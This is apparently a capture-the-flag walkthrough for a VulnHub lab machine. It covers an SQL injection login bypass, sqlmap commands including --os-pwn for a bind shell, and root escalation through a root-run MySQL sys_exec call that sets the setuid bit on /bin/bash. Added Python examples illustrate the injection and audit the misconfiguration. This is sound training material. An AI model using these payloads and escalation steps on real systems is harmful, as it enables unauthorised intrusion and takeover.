The object of the game is to acquire root access
Based on reviewing the VulnHub.com site, the listed vulnerabilities were:
In addition, there was a text flag located on the system.
As you can see from nmap, we have the services below:
• Apache (Web Server)
So the first thing we are going to have a look at will be the website.
The first thing we are going to do is see if we can log into this
website. I tried a bunch of default username and password combinations, but
nothing worked. Finally I turned to the top web app vulnerabilities and
found that when I replaced the password with
pass' or 1=1 # the login didn't fail, but it still gave me an error (at this point I am assuming that admin is not a valid username).
OK, so at this point I suspect that the login is vulnerable to SQL injection. So let's get sqlmap running and see if it can get more information about the server and website.
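To make the injection concrete, here is an added example (mine, not code from the post or from the VM) that reproduces the classic PHP login pattern in Python against an in-memory SQLite table. The table name, its columns and the user rows are constructed stand-ins, since the post never shows the real query. The post's payload ends in `#`, which is MySQL's end-of-line comment marker; SQLite only understands `--`, so the same trick is written with `-- ` here.

```python
import sqlite3

# Constructed sample data standing in for the VM's user table; the post never
# shows the real table, so the name "members", its columns and these rows are
# assumptions of this example.
USERS = [("admin", "s3cret"), ("bob", "hunter2")]

# The post's payload is  pass' or 1=1 #  ; '#' is a MySQL comment marker that
# SQLite does not know, so the same injection is written with '-- ' here.
PAYLOAD = "pass' OR 1=1 -- "


def make_db():
    """In-memory SQLite database holding the sample members table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)", USERS)
    return db


def build_unsafe_query(username, password):
    """Mirror the classic PHP login: form fields concatenated into the SQL."""
    return ("SELECT username FROM members "
            "WHERE username='%s' AND password='%s'" % (username, password))


def login_unsafe(db, username, password):
    """Rows matched by the concatenated query (the classic script treats
    exactly one returned row as a successful login)."""
    return db.execute(build_unsafe_query(username, password)).fetchall()


def login_safe(db, username, password):
    """Hardened form: bound parameters, so the payload is compared as data
    and never parsed as SQL."""
    return db.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_unsafe_query("admin", PAYLOAD))
    print("unsafe:", login_unsafe(db, "admin", PAYLOAD))  # every row comes back
    print("safe:  ", login_safe(db, "admin", PAYLOAD))    # []
```

The unsafe query returns every row because AND binds tighter than OR, so the WHERE clause becomes `(username='admin' AND password='pass') OR 1=1`, and the trailing comment swallows the closing quote the script appended. A login script that only accepts exactly one returned row would then show an error rather than a success; that is one possible reading of the "didn't fail, but still gave an error" behaviour above, and an assumption rather than something the post confirms. The parameterised version treats the payload as a plain string and returns nothing.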
So when we submit the login, it sends a POST request to checklogin.php. The data in the POST request is
So when we run sqlmap, we will need to provide the details below.
-u http://10.0.0.56/checklogin.php (the URL we will be sending the POST to) --data "myusername=admin&mypassword=pass&Submit=Login" (the POST data)
So sqlmap suspects that mypassword is injectable. The problem is
that the default risk and level are too low to exploit this parameter, so
let's increase the level and risk and re-scan. To do this we will add
--risk 3 --level 4 to the end of the sqlmap command. Risk 3 is what enables sqlmap's OR-based boolean tests, which is the same shape as the manual or 1=1 payload that worked above; bear in mind that OR-based payloads can modify data if the injection point turns out to be inside an UPDATE or DELETE statement.
Sweet. So let's see if we can get a shell on the server using the
Looks great. I now have the ability to execute commands on the server. At the moment we are running as www-data, so our next challenge is to get to root.
Something interesting I found is that MySQL (mysqld) appears to be running as root. Anything the database server executes on our behalf will therefore run as root too, so maybe I can get it to run commands for us.
To do this, I would like to get a better shell on the box, so I will be using sqlmap with the
--os-pwn option. This pushes a Metasploit payload (a bind shell in this case) onto the server and runs it; it needs the Metasploit Framework installed on the attacking machine.
OK, so we now have a better shell on the server. Next I need to locate some credentials that can be used to log into MySQL. To do this we will look through the PHP files in the web server's root folder.
OK, so let's take a look at checklogin.php.
As you can see above, we now have credentials.
Next we will need to connect to MySQL using
mysql -u root -p
Once connected to MySQL, we are going to run
Then we will use the function sys_exec in MySQL to execute chmod. This will let us set the SUID bit on /bin/bash, which will allow us to run it as root. Note that sys_exec is not a built-in MySQL function: it comes from the lib_mysqludf_sys UDF library, which sqlmap registers on the server for its --os-* options, and whatever it runs inherits the privileges of the mysqld process, which here is root.
To do this we will run
select sys_exec('chmod u+s /bin/bash');
Then when we exit MySQL, we will run
bash -p (run bash in privileged mode, which keeps the effective UID of root instead of resetting it to our real UID, as bash does by default when the two differ) and, after checking our permissions, we have root.
Now that we have root, we will go and open the flag in /root.
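The chain above works only because three conditions line up: mysqld runs as root, a command-execution UDF is available to the database (sys_exec from lib_mysqludf_sys, which sqlmap registers for its --os-* options), and the resulting chmod leaves a setuid /bin/bash that bash -p will honour. The Python audit below is an added example, not code from the post; it checks each of those conditions the way a tester or a defender would on a live box. The ps output and the mysql.func rows are constructed samples, and the function names and paths are mine.

```python
import os
import stat
import tempfile

# Constructed sample of `ps -eo user,pid,comm` on a box where mysqld runs as
# root (the misconfiguration the post relies on) and on a correctly set up one.
PS_SAMPLE_ROOT = """\
USER       PID COMMAND
root         1 init
root       812 mysqld
www-data   901 apache2
"""

PS_SAMPLE_OK = """\
USER       PID COMMAND
root         1 init
mysql      812 mysqld
www-data   901 apache2
"""

# Constructed sample of `SELECT name, dl FROM mysql.func` after sqlmap has
# registered the lib_mysqludf_sys UDFs; the library file name is assumed.
FUNC_ROWS = [("sys_exec", "lib_mysqludf_sys.so"),
             ("sys_eval", "lib_mysqludf_sys.so")]


def mysqld_owner(ps_output):
    """User that mysqld runs as, or None if no mysqld process is listed."""
    for line in ps_output.splitlines()[1:]:      # skip the header line
        parts = line.split()
        if len(parts) >= 3 and parts[2] == "mysqld":
            return parts[0]
    return None


def mysqld_runs_as_root(ps_output):
    return mysqld_owner(ps_output) == "root"


def shell_udfs(func_rows):
    """Names of command-execution UDFs registered in mysql.func."""
    return sorted(name for name, _dl in func_rows if name in ("sys_exec", "sys_eval"))


def has_setuid_bit(path):
    """True if the setuid bit is set, which is what chmod u+s produces."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def running_with_elevated_euid():
    """What bash -p preserves: an effective UID different from the real one.
    Without -p, bash resets the effective UID to the real UID at startup."""
    return os.geteuid() != os.getuid()


def setuid_bit_demo():
    """Set u+s on a scratch file the way the post does on /bin/bash and report
    the bit before and after (an owner may set it on their own file)."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        before = has_setuid_bit(path)
        os.chmod(path, 0o4755)
        after = has_setuid_bit(path)
    finally:
        os.remove(path)
    return before, after


def audit(ps_output, func_rows, shell_path="/bin/bash"):
    """Findings for the three conditions the post's escalation depends on."""
    findings = []
    if mysqld_runs_as_root(ps_output):
        findings.append("mysqld runs as root: any UDF it executes runs as root too")
    for name in shell_udfs(func_rows):
        findings.append("command-execution UDF registered: %s" % name)
    if os.path.exists(shell_path) and has_setuid_bit(shell_path):
        findings.append("%s has the setuid bit set" % shell_path)
    return findings


if __name__ == "__main__":
    for finding in audit(PS_SAMPLE_ROOT, FUNC_ROWS):
        print("FINDING:", finding)
    print("setuid bit before/after chmod u+s:", setuid_bit_demo())
    print("running with elevated euid:", running_with_elevated_euid())
```

On a real system, feed `audit` the live output of `ps -eo user,pid,comm` and the rows from `SELECT name, dl FROM mysql.func`; the fix for the root cause is to run mysqld under a dedicated account (the `user=mysql` setting in my.cnf) and to drop any sys_exec or sys_eval functions that were never deliberately installed.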
If you find any errors or issues within this post, please comment below and I will correct. I will also provide any advice I can.